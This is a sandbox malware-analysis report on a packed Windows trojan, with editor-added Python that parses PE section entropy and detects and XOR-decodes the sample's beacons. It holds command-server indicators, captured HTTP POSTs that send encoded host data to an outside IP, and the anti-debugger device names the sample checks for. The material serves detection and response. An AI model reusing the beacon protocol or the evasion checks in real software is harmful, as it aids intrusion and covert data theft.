
Tags: None

Analysis

Category Started Completed Duration
FILE 2013-11-28 11:37:10 2013-11-28 11:39:31 141 seconds

File Details

File Name FT211c.exe
File Size 51200 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5 4fa91b76294d849d01655ffb72b30981
SHA1 1220d6576bca4a9d49b913a134ea01da04dc2934
SHA256 592bb53f45d49e1002a0bb98b533111bc3edb1421564982977a4be4053137d2a
SHA512 6d24a6aafe90173f84fa441231b42eb97511aeae01da07a446cb7368018d522b41e953cf2544f2adc32119f48fc8be6c862b578cc1d9d60d05527b4e238ea34f
CRC32 59452FB4
Ssdeep 768:lvwhFHWNBv4XkwnSRl77tBEvPs91xyTS/rydsJwFlTKElMfGEl8XBl8Ori3f:lohYv4UwnSR1BnxyO/rydgwjFJBeh
Yara None matched

Signatures

File has been identified by at least one AntiVirus on VirusTotal as malicious
Performs some HTTP requests
The executable is compressed using UPX
section UPX0: virtual address 0x00001000, virtual size 0x0000c000, size of raw data 0x00000000, entropy 0.0
Checks for the presence of known devices from debuggers and forensic tools

Screenshots


Hosts

IP
188.190.101.13

Domains

No domains contacted.


Summary

Files

SICE
SIWVID
NTICE
TRW
TWX
ICEEXT
SYSER
IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#42562d3231303037333036372020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
MountPointManager
STORAGE#Volume#1&30a96598&0&Signature32B832B7Offset7E00Length27F4DB200#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
C:\Program Files
index.htm
c:\
Registry Keys

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\BagMRU
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\FT211c.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7950-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CLASSES_ROOT\Directory
HKEY_CLASSES_ROOT\Directory\CurVer
HKEY_CLASSES_ROOT\Directory\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7950-e3d2-11e0-8d7a-806d6172696f}\\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CLASSES_ROOT\Directory\\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Directory\\Clsid
HKEY_CLASSES_ROOT\Folder
HKEY_CLASSES_ROOT\Folder\Clsid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\.htm
HKEY_CLASSES_ROOT\.htm
HKEY_CLASSES_ROOT\htmlfile
HKEY_CLASSES_ROOT\htmlfile\CurVer
HKEY_CLASSES_ROOT\htmlfile\
HKEY_CLASSES_ROOT\htmlfile\opennew
Mutexes

DBWinMutex
CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
UPX0 0x00001000 0x0000c000 0x00000000 0.0
UPX1 0x0000d000 0x0000d000 0x0000c200 7.95842977912
.rsrc 0x0001a000 0x00001000 0x00000400 2.93055497499
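The Entropy column and the UPX0 line under Signatures (raw size 0, virtual size 0xc000) are the packer's footprint: UPX1 holds the compressed image at close to 8 bits per byte, and UPX0 is the empty region the stub decompresses into at run time. The following Python example is added by the editor and is not code from the Cuckoo report. It walks a PE section table with `struct`, computes Shannon entropy per section and classifies each row the way the table above is read. It builds a constructed minimal PE with the same section layout so it runs offline; the 7.5 threshold in `classify` is a rule of thumb, not a figure from the report.

```python
import math
import struct
from collections import Counter

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = struct.Struct("<HHIIIHH")          # IMAGE_FILE_HEADER, 20 bytes


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for
    uniformly distributed bytes. This is the figure in the Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Walk the section table of a PE image and return, per section,
    (name, virtual_address, virtual_size, size_of_raw_data, entropy)."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsections, _, _, _, opt_size, _ = COFF_HDR.unpack_from(image, e_lfanew + 4)
    table = e_lfanew + 4 + COFF_HDR.size + opt_size
    rows = []
    for i in range(nsections):
        name, vsize, vaddr, rsize, rptr, *_ = SECTION_HDR.unpack_from(
            image, table + i * SECTION_HDR.size)
        raw = image[rptr:rptr + rsize] if rsize else b""
        rows.append((name.rstrip(b"\0").decode("ascii", "replace"),
                     vaddr, vsize, rsize, shannon_entropy(raw)))
    return rows


def classify(vsize: int, rsize: int, entropy: float) -> str:
    """Reading of one table row. The 7.5 threshold is a common rule of thumb
    for compressed or encrypted data, not a number taken from the report."""
    if rsize == 0 and vsize > 0:
        return "virtual only: unpacking destination"
    if entropy > 7.5:
        return "packed or encrypted"
    return "plain"


def build_pe(sections) -> bytes:
    """Constructed minimal PE (MZ stub, COFF header, no optional header,
    section table, raw data) so the parser can be exercised offline.
    sections is a list of (name, virtual_address, virtual_size, raw_bytes)."""
    e_lfanew = 0x40
    headers_end = e_lfanew + 4 + COFF_HDR.size + SECTION_HDR.size * len(sections)
    data_start = (headers_end + 0x1FF) & ~0x1FF          # 0x200 file alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + COFF_HDR.pack(0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table, body, ptr = b"", b"", data_start
    for name, vaddr, vsize, raw in sections:
        table += SECTION_HDR.pack(name.encode().ljust(8, b"\0"), vsize, vaddr,
                                  len(raw), ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        body += raw
        ptr += len(raw)
    headers = dos + coff + table
    return headers + b"\0" * (data_start - len(headers)) + body


def report_like_image() -> bytes:
    """Constructed image mirroring the table above: UPX0 has no raw data, UPX1
    carries 0xC200 bytes of high-entropy data (a repeated 0..255 ramp, which
    scores exactly 8.0), .rsrc is 0x400 bytes of zeros."""
    return build_pe([
        ("UPX0", 0x1000, 0xC000, b""),
        ("UPX1", 0xD000, 0xD000, bytes(range(256)) * (0xC200 // 256)),
        (".rsrc", 0x1A000, 0x1000, b"\0" * 0x400),
    ])


if __name__ == "__main__":
    print(f"{'Name':6} {'VA':>10} {'VSize':>10} {'RawSize':>10} {'Entropy':>8}  Verdict")
    for name, vaddr, vsize, rsize, ent in pe_sections(report_like_image()):
        print(f"{name:6} {vaddr:#010x} {vsize:#010x} {rsize:#010x} {ent:8.3f}  "
              f"{classify(vsize, rsize, ent)}")
```

Pointing `pe_sections` at a real file (`pe_sections(open(path, "rb").read())`) reproduces the three columns the report derives from the section headers; the verdict column is the editor's heuristic, and an unpacked sample will normally show its code section well below the threshold.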

Imports

Library KERNEL32.DLL:
0xc9a1ac LoadLibraryA
0xc9a1b0 GetProcAddress
0xc9a1b4 VirtualProtect
0xc9a1b8 VirtualAlloc
0xc9a1bc VirtualFree
0xc9a1c0 ExitProcess
Library advapi32.dll:
0xc9a1c8 RegOpenKeyA
Library oleaut32.dll:
0xc9a1d0 SysFreeString
Library PSAPI.dll:
Library shell32.dll:
0xc9a1e0 SHGetMalloc
Library user32.dll:
0xc9a1e8 CharNextW

Strings

This program must be run under Win32
)iVjg_
_o *73
7L!aY$
<+5oc
Zv"{DR
E[V$?!
pZdpXA=
1U?OgBk
1kT C!
=Q|Q"6;G
,Z5h?0
Q`Thf:K
)"+.u'
GX,3Z!Ac
Qd8=kw^
AnZ\G`'
D9yPx
71@ g|G
`wX{/ +!
}Cq< X
l{!JCS
ejPyghI
RU6wFI
4v>2}B
x>C3|4
@GbG/k
/,p2~<
^1xQ0/
k}@f}6
N[S_J
j@3X@%d(
;YU3^J
z>5mo\L
&$X4Na
j{cwr,
<$2(-!@
:-.\O2
3^8bzdz
D.Tpr}
Esf,9#
B<N u~T
AKWz?c
HT0P|cn<
_t [0So
w 4N;
+9./i^
K3xc1C
n7CIQn
#J(MT>1
u2S_~kq
"lZO+f
-](wo6
:#-^}s
D$FHX<i
~&|cdm3$t
v;Wha]~
h.,NbF
67.,kl~y
o{96HP-
90Fw<s
wCGsFx
RtBXit
Z?|;dp+Q
2*(6<^o
o(CDwQ
gNd\g(^[
3Cuv.M
ApUQ*kN)Y
1lJ|.^!
[hm70K'
dCeyA
Y`Ft.`
[SYXIi0
?XJeN4u{
2N<H0i
~ XTp~
=#egBP
ye"x#?
@z<6$^
,g)pJ/
TTv0zx
(,w5kaD
3'>e|'
a7GkT\
o;OU`n
p?$Kbj
tt;QC
F3ByIc
t$t#t$l
D$t#D$h
D$t+D$\
.)D$H+
s`)L$4
D$t+D$\
)D$H)
9l$\w_
XPTPSW
KERNEL32.DLL
advapi32.dll
oleaut32.dll
PSAPI.dll
shell32.dll
user32.dll
LoadLibraryA
GetProcAddress
VirtualProtect
VirtualAlloc
VirtualFree
ExitProcess
RegOpenKeyA
SysFreeString
GetModuleFileNameExW
SHGetMalloc
CharNextW

Antivirus Signature
Bkav Clean
MicroWorld-eScan Gen:Variant.Barys.2752
nProtect Clean
CAT-QuickHeal Clean
McAfee Artemis!4FA91B76294D
Malwarebytes Clean
TheHacker Posible_Worm32
K7GW Trojan ( 0048e7511 )
K7AntiVirus Trojan ( 0048e7511 )
NANO-Antivirus Clean
F-Prot Clean
Symantec Trojan.Gen.2
Norman Troj_Generic.RAFTQ
TotalDefense Clean
TrendMicro-HouseCall TROJ_GEN.F47V1110
Avast Win32:DelfInject [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Variant.Barys.2752
Agnitum Clean
SUPERAntiSpyware Clean
ByteHero Clean
Emsisoft Gen:Variant.Barys.2752 (B)
Comodo TrojWare.Win32.Injector.FR
F-Secure Gen:Variant.Barys.2752
DrWeb Clean
VIPRE Trojan.Win32.Injector.ikp (v)
AntiVir TR/Crypt.ULPM.Gen
TrendMicro PAK_Generic.001
McAfee-GW-Edition Heuristic.BehavesLike.Win32.ModifiedUPX.C
Sophos Mal/Generic-S
Jiangmin Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft VirTool:Win32/DelfInject.gen!CP
ViRobot Clean
GData Gen:Variant.Barys.2752
Commtouch W32/Trojan.XBYP-5411
AhnLab-V3 Clean
VBA32 SScope.Trojan.MBRLock.2121
Baidu-International Trojan.Win32.Generic.AvUI
ESET-NOD32 Win32/Delf.ACC
Rising Suspicious
Ikarus Trojan.Win32.Spy
Fortinet W32/Delf.ACC
AVG Delf.ANDS
Panda Trj/CI.A

Process Tree

  • FT211c.exe 1088
    • certlogtwain.exe 1952
      • iexplore.exe 1944

FT211c.exe, PID: 1088, Parent PID: 1824
certlogtwain.exe, PID: 1952, Parent PID: 1088
iexplore.exe, PID: 1944, Parent PID: 1952


HTTP Requests

URI Data
http://188.190.101.13/hor/input.php
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded

m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=
http://188.190.101.13/hor/input.php
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://udot.tk
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=
http://188.190.101.13/hor/input.php
POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://www.gano.at
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=
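The three request bodies above are form-encoded fields whose values are base64, and the only parts of the request that change between beacons are the Referer and the body. The following Python example is added by the editor and is not code from the Cuckoo report or from the sample. It does three things a responder would want: matches the beacon on the stable parts of the request (POST to /hor/input.php with the hand-rolled User-Agent and an all-base64 form body), decodes the bodies, and tries every single-byte XOR key, keeping the one under which the most decoded bytes are letters, digits, space or '.'. That a single-byte XOR is in use at all is an assumption the script tests rather than something the report states; the request text is copied from the capture, while the benign GET request is constructed.

```python
import base64
import re

# First request exactly as captured above; the other two differ only in the
# Referer and in a shorter body (both copied from the report, not constructed).
REQUEST = (
    "POST /hor/input.php HTTP/1.0\r\n"
    "Host: 188.190.101.13\r\n"
    "User-Agent: Mozilla Gecko Firefox 25\r\n"
    "Accept: text/plain\r\n"
    "Accept-Encoding: identity\r\n"
    "Accept-Language: en-EN,en\r\n"
    "Connection: Close\r\n"
    "Referer: http://mhome.br\r\n"
    "Content-Length: 106\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs="
)
FOLLOWUP_BODY = "m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE="

# Constructed benign request, only there to show the matcher stays quiet on it.
BENIGN = "GET /index.htm HTTP/1.1\r\nHost: example.invalid\r\nUser-Agent: Mozilla/5.0\r\n\r\n"


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, uri, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, uri, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, uri, headers, body


def is_beacon(raw: str) -> bool:
    """Indicator match built from the capture: same path, the odd User-Agent,
    form-encoded body whose every field is base64. The Referer is ignored on
    purpose because it changes on every request."""
    method, uri, headers, body = parse_request(raw)
    return (method == "POST"
            and uri == "/hor/input.php"
            and headers.get("user-agent") == "Mozilla Gecko Firefox 25"
            and headers.get("content-type") == "application/x-www-form-urlencoded"
            and all(re.fullmatch(r"[a-z]+=[A-Za-z0-9+/]+={0,2}", f) for f in body.split("&")))


def parse_body(body: str) -> dict:
    """Form fields -> raw decoded bytes. Split on the first '=' only, since the
    base64 padding is also '='; '+' is kept literal (parse_qs would turn it into
    a space and corrupt the base64)."""
    fields = {}
    for part in body.split("&"):
        name, _, value = part.partition("=")
        fields[name] = base64.b64decode(value)
    return fields


# Byte values expected in a plaintext beacon: letters, digits, space and '.'.
PLAIN = set(b"0123456789 .") | set(range(0x41, 0x5B)) | set(range(0x61, 0x7B))


def recover_xor_key(fields: dict) -> int:
    """Try every single-byte XOR key and keep the one under which the most
    decoded bytes fall into PLAIN (lowest key on a tie). Single-byte XOR is an
    assumption; a best score well below the byte count would refute it."""
    blob = b"".join(fields.values())
    return max(range(256), key=lambda k: (sum((b ^ k) in PLAIN for b in blob), -k))


def decode_fields(fields: dict, key: int) -> dict:
    return {n: bytes(b ^ key for b in v).decode("latin-1") for n, v in fields.items()}


def decode_capture():
    """Recover the key from the first (longest) body, then decode both bodies."""
    first = parse_body(parse_request(REQUEST)[3])
    key = recover_xor_key(first)
    return key, decode_fields(first, key), decode_fields(parse_body(FOLLOWUP_BODY), key)


if __name__ == "__main__":
    print("beacon?", is_beacon(REQUEST), " benign?", is_beacon(BENIGN))
    key, first, second = decode_capture()
    print(f"key=0x{key:02x}")
    for name, value in first.items():
        print(f"  {name} = {value!r}")
    print("  follow-up:", second)
```

The script settles on key 0x38, which is the only key that maps every byte of every field into the PLAIN set. Under it `h` is a 29-digit number that is identical in all three requests, `p` reads HOME, `v` reads 2.11 USA, `s` reads 5 x86 A 0d 0h 7m 28s, and `m` changes from 0 in the first request to 1 in the two follow-ups, which carry only `m` and `h`. What each field means to this family (a bot identifier, an OS edition, a build string and an OS version, architecture and uptime string would be the obvious guesses) is not established by the report and should be confirmed against the unpacked sample before it is used in reporting.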

IRC Traffic

No IRC traffic.

SMTP Requests

No SMTP requests performed.

Dropped Files

No dropped files.